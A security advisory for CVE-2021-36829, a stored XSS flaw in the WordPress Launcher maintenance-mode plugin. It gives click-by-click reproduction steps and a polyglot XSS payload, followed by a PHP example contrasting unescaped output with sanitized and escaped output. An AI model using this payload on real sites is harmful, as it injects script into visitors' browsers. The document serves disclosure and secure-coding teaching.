[47] CVE-2021-36829
During security research I found an authenticated Stored XSS vulnerability. The name of the plugin is: WordPress Launcher: Coming Soon & Maintenance Mode plugin <= 1.0.11
Description
Authenticated Stored Cross-Site Scripting (XSS) vulnerability discovered
by Asif Nawaz Minhas (Patchstack Alliance) in WordPress Launcher:
Coming Soon & Maintenance Mode plugin (versions <= 1.0.11).
POC
On the left column click on Settings > Launcher.
First click on the checkbox Enable Launcher Page, then scroll down
and click on Save Changes.
You will now see many tabs here. Click on the tab Subscribe Form.
In the Email field label add the following payload:
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
Now click on Save Changes, and on any page you visit you will
see the authenticated stored XSS vulnerability.
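The PoC works because the stored label reaches the page without output encoding. The following is an added example, not the plugin's code or its patch: plain PHP showing that pattern beside a hardened one, with hypothetical function names and a constructed, shortened sample of the payload.

```php
<?php
// Added example; function names and the sample value are hypothetical.
// Constructed sample: a shortened form of the PoC payload as it would sit
// in the stored "Email field label" setting.
$stored_label = '\'"><img src=x onerror=confirm(1)><script>alert(1)</script>';

// Vulnerable pattern: the stored setting is concatenated into markup as-is.
function render_unsafe(string $label): string {
    return '<label for="email">' . $label . '</label>'
         . '<input id="email" type="email" placeholder="' . $label . '">';
}

// Clean on save: a label is plain text, so drop tags and control characters.
// (In WordPress, sanitize_text_field() serves this purpose.)
function sanitize_label(string $raw): string {
    $text = preg_replace('/[\x00-\x1F\x7F]+/', ' ', strip_tags($raw));
    return trim(preg_replace('/\s+/', ' ', $text));
}

// Encode on output, in both element and attribute context.
// (In WordPress, esc_html() and esc_attr() serve this purpose.)
function render_safe(string $label): string {
    $enc = htmlspecialchars($label, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<label for="email">' . $enc . '</label>'
         . '<input id="email" type="email" placeholder="' . $enc . '">';
}

// Count elements and on* handlers that the stored value added to the form.
function count_injected(string $html): int {
    libxml_use_internal_errors(true); // the unsafe rendering is malformed HTML
    $doc = new DOMDocument();
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    $expected = ['html', 'head', 'body', 'label', 'input'];
    $count = 0;
    foreach ($doc->getElementsByTagName('*') as $el) {
        if (!in_array(strtolower($el->tagName), $expected, true)) { $count++; }
        foreach ($el->attributes as $attr) {
            if (stripos($attr->name, 'on') === 0) { $count++; }
        }
    }
    return $count;
}

printf("unsafe:            %d injected\n", count_injected(render_unsafe($stored_label)));
printf("escaped only:      %d injected\n", count_injected(render_safe($stored_label)));
printf("sanitized+escaped: %d injected\n", count_injected(render_safe(sanitize_label($stored_label))));
```

Output encoding is what stops the browser from parsing the stored value as markup; sanitizing on save additionally keeps the markup out of the database.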
Additional information
The plugin had 5000+ active installations.